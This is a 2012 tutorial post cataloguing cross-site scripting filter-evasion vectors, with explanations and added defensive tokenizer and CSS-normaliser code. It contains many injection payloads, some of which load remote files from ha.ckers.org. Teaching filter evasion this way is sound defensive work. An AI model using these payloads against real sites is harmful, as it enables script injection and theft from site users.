Introduction to Cross Site Scripting (XSS) attack techniques

Posted 2012-12-31 09:59:28

Most of the vectors below were collected against the Internet Explorer of that time: expression(), DATASRC/DATAFLD data binding, HTML+TIME, DYNSRC/LOWSRC and javascript: inside IMG or CSS url() no longer work in current browsers. The parser behaviours they exploit (case folding, "/" as a separator, ">" inside quoted values, CSS escapes, entity decoding, tab and newline stripping in URLs) are unchanged, and they are what a filter still has to reproduce before it compares anything.
1. Change the case of characters

    <sCript>alert('d')</scRipT>

Tag names are ASCII case-insensitive to the HTML parser, so a filter that matches "<script>" case-sensitively lets this through.

2. Add extra characters to evade a regular-expression check

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" " SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

The first one defeats detectors that pair a "<" with the next ">" and compare what lies between them; the browser treats the stray "<" as text and still opens the script tag. The others put a ">" inside an attribute value, so a pattern such as <script[^>]*src= stops at that ">" and never reaches the SRC. The backtick form depended on Internet Explorer accepting ` as a quote character; HTML5 parsers do not, so that one no longer works.

3. Use a different extension in place of .js

    <script src="bad.jpg"></script>

The browser does not care about the extension of a script source, only about the response body, so an allowlist of "safe" extensions proves nothing. With X-Content-Type-Options: nosniff a browser refuses to execute a script whose response does not carry a JavaScript Content-Type, so a file served as image/jpeg cannot be loaded this way.

4. Put JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

    example (contents of xss.css):

        body {
            background-image: url('javascript:alert("XSS");')
        }

The payload is not in the page at all, only in the external stylesheet. javascript: inside a CSS url() executed in old Internet Explorer; current browsers do not execute it.

5. Insert other characters into the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

Between the tag name and an attribute, "/" is accepted as a separator just like whitespace, so a filter that looks for "<script " followed by a space never sees the SRC.
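The parser behaviour behind sections 1, 2 and 5, as an added example that is not part of the original post: a small tag tokenizer written here to follow the HTML5 rules (case folding, "/" as a separator, quoted values that may contain ">") next to a regex filter of the kind these vectors defeat. The NAIVE_EXTERNAL_SCRIPT pattern, the function names and the sample markup are constructed for this example.

```javascript
// Added example (not from the original post): a tag tokenizer that follows the
// browser's attribute rules, next to the kind of regex filter the vectors above defeat.

// The regex filter: it assumes the tag ends at the first ">" and that attributes
// are separated only by whitespace.
const NAIVE_EXTERNAL_SCRIPT = /<script[^>]*\ssrc\s*=/i;

function naiveHasExternalScript(html) {
  return NAIVE_EXTERNAL_SCRIPT.test(html);
}

const isSpace = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\r' || c === '\f';

// Tokenize start and end tags the way the HTML5 tokenizer does for these cases:
//  - tag and attribute names are ASCII case-insensitive (normalised to lower case),
//  - "/" between attributes acts like whitespace, so <SCRIPT/SRC=...> has a src,
//  - a quoted attribute value may contain ">", so the tag does not end at the first ">",
//  - "<" not followed by a letter or "/" is text, so "<<script>" still opens a tag.
// Returns [{ name, closing, attrs }]; the raw-text script body is not modelled.
function tokenizeTags(html) {
  const tags = [];
  const n = html.length;
  let i = 0;
  while (i < n) {
    const lt = html.indexOf('<', i);
    if (lt === -1) break;
    let j = lt + 1;
    const closing = html[j] === '/';
    if (closing) j++;
    if (!/^[A-Za-z]$/.test(html[j] || '')) { i = lt + 1; continue; }
    let name = '';
    while (j < n && !isSpace(html[j]) && html[j] !== '/' && html[j] !== '>') name += html[j++];
    const attrs = {};
    while (j < n && html[j] !== '>') {
      while (j < n && (isSpace(html[j]) || html[j] === '/')) j++;
      if (j >= n || html[j] === '>') break;
      let attr = '';
      if (html[j] === '=') attr += html[j++];   // "=" may begin an attribute name
      while (j < n && !isSpace(html[j]) && html[j] !== '/' && html[j] !== '>' && html[j] !== '=') attr += html[j++];
      let value = '';
      if (html[j] === '=') {
        j++;
        while (j < n && isSpace(html[j])) j++;
        const q = html[j];
        if (q === '"' || q === "'") {           // quoted value: a ">" inside is data
          const end = html.indexOf(q, j + 1);
          value = html.slice(j + 1, end === -1 ? n : end);
          j = end === -1 ? n : end + 1;
        } else {
          while (j < n && !isSpace(html[j]) && html[j] !== '>') value += html[j++];
        }
      }
      const key = attr.toLowerCase();
      if (!(key in attrs)) attrs[key] = value;  // first occurrence wins, as in browsers
    }
    tags.push({ name: name.toLowerCase(), closing, attrs });
    i = j + 1;
  }
  return tags;
}

// The question a filter should ask: which <script> start tags are there, and what do they load?
function externalScriptSources(html) {
  return tokenizeTags(html)
    .filter((t) => t.name === 'script' && !t.closing && 'src' in t.attrs)
    .map((t) => t.attrs.src);
}

// Side by side: the regex misses both vectors, the tokenizer reports t.js for each.
for (const v of ['<SCRIPT/SRC="t.js"></SCRIPT>', '<SCRIPT a=">" SRC="t.js"></SCRIPT>']) {
  console.log(v, 'regex:', naiveHasExternalScript(v), 'tokenizer:', externalScriptSources(v));
}
```

Run it with node. The point is not the tokenizer itself but the asymmetry: whatever the filter matches on has to be the same token stream the browser builds, and a regex over raw text is a different parser.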

6. Use a tab or newline to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> new line

The gaps inside "jav ascr ipt" stand for a literal tab or newline character, as the two annotations indicate. The URL parser removes ASCII tab, LF and CR anywhere in a URL (and strips leading control characters) before it reads the scheme, so the browser sees javascript: while a pattern written against the literal string does not. A plain space is not removed, so a space in that position does not work.

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

CSS reads "\c" as the character c (or as a hex code point, see 8) and discards /* */ comments before it interprets the text, so the engine sees expression( and javascript: while a literal match does not. In the last one the "/*" hidden inside the string literal "*//*" makes a comment stripper that is not string-aware throw away the wrong span and miss the real expression. expression() itself is an Internet Explorer feature.
8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Two different encoders apply here: in CSS a character is written as a backslash plus its hex code point (\65 or \0065 for "e", with one optional whitespace after it); in an HTML attribute it is a numeric character reference (&#x6A; or &#106; for "j"), and the HTML parser accepts those without the trailing ";", which is the point in the heading. Either way the decoded text is what the browser acts on, so a filter has to decode before it compares.
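Sections 7 and 8 both rely on the CSS tokenizer undoing escapes and comments before the text is interpreted. The following is an added example, not code from the original post: a normaliser written here that does the same (string-aware, so the "*//*" trick does not fool it), a cssHexEncode helper that produces the hex-escaped form of the DIV vector, and a literal match run before and after normalising. The function names and the DANGEROUS_CSS pattern are this example's own.

```javascript
// Added example (not from the original post): normalise a style value the way a CSS
// tokenizer does, so that the backslash, comment and hex-escape tricks from sections 7
// and 8 collapse back to the plain text a filter can match.

// A literal match on the dangerous tokens, which the vectors above get past.
const DANGEROUS_CSS = /expression\s*\(|javascript\s*:|@import/i;

function naiveCssMatch(css) {
  return DANGEROUS_CSS.test(css);
}

// The section 8 encoding: every character as a CSS hex escape "\00hh".
function cssHexEncode(s) {
  return Array.from(s, (c) => '\\' + c.charCodeAt(0).toString(16).toUpperCase().padStart(4, '0')).join('');
}

// Undo what the CSS tokenizer undoes:
//  - "/* ... */" comments are dropped, but not when they start inside a string literal,
//  - "\" + 1-6 hex digits (+ one optional whitespace) is the code point,
//  - "\" + any other character is that character,
//  - "\" + newline inside a string is a line continuation.
function normalizeCss(css) {
  const n = css.length;
  let out = '';
  let quote = null;                         // delimiter of the string we are inside, or null
  let i = 0;
  while (i < n) {
    const c = css[i];
    if (quote === null && c === '/' && css[i + 1] === '*') {
      const end = css.indexOf('*/', i + 2);
      i = end === -1 ? n : end + 2;         // an unterminated comment swallows the rest
      continue;
    }
    if (c === '\\') {
      const hex = /^[0-9A-Fa-f]{1,6}/.exec(css.slice(i + 1, i + 7));
      if (hex) {
        const cp = parseInt(hex[0], 16);
        out += String.fromCodePoint(cp === 0 || cp > 0x10ffff ? 0xfffd : cp);
        i += 1 + hex[0].length;
        if (/^[ \t\n\r\f]$/.test(css[i] || '')) i++;   // one whitespace after the escape is eaten
        continue;
      }
      if (quote !== null && css[i + 1] === '\n') { i += 2; continue; }
      out += css[i + 1] === undefined ? '' : css[i + 1];
      i += 2;
      continue;
    }
    if (quote === null && (c === '"' || c === "'")) quote = c;
    else if (c === quote) quote = null;
    out += c;
    i++;
  }
  return out;
}

// Match after normalising: this is what the filter should have done.
function cssMatchAfterNormalize(css) {
  return DANGEROUS_CSS.test(normalizeCss(css));
}

const encoded = 'width: ' + cssHexEncode('expression') + "(alert('XSS31'));";
console.log(encoded);                                                  // the hex-escaped DIV vector
console.log(naiveCssMatch(encoded), cssMatchAfterNormalize(encoded));  // false true
```

The string-awareness matters: a one-line comment stripper applied to the last vector of section 7 removes from the "/*" inside "*//*" up to the first "*/" and is left with noxss(...pression, whereas the tokenizer above, like the CSS engine, sees expression.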

9. Script in an HTML tag

    <body onload="alert('onload')">

Any event-handler attribute carries script, not only onload:

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside an SWF

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

AllowScriptAccess="always" lets the Flash movie call the embedding page's JavaScript, so the payload lives in the .swf and the markup itself contains no script.
11. Use CDATA to split the XSS code and reassemble it

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

The string "javascript:" never appears contiguously in the source; Internet Explorer's XML data islands and data binding (DATASRC/DATAFLD with DATAFORMATAS=HTML) join the pieces when the SPAN renders them as HTML.
12. Use HTML+TIME

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
    </BODY></HTML>

HTML+TIME (Internet Explorer only) assigns the "to" value to the element's innerHTML. The markup is entity-encoded inside the attribute, so no "<SCRIPT" appears in the source, and DEFER is what makes IE execute a script inserted through innerHTML.
13. Set a cookie via META

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

This plants the payload in a cookie for a page that later echoes the cookie value unescaped. Current browsers ignore Set-Cookie given through META.
14. javascript: in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

Any attribute or CSS property that takes a URL is a candidate, not just href. Current browsers still run javascript: URLs given as IFRAME or FRAME SRC; the IMG, DYNSRC, LOWSRC, TABLE BACKGROUND and CSS url() forms only worked in old Internet Explorer.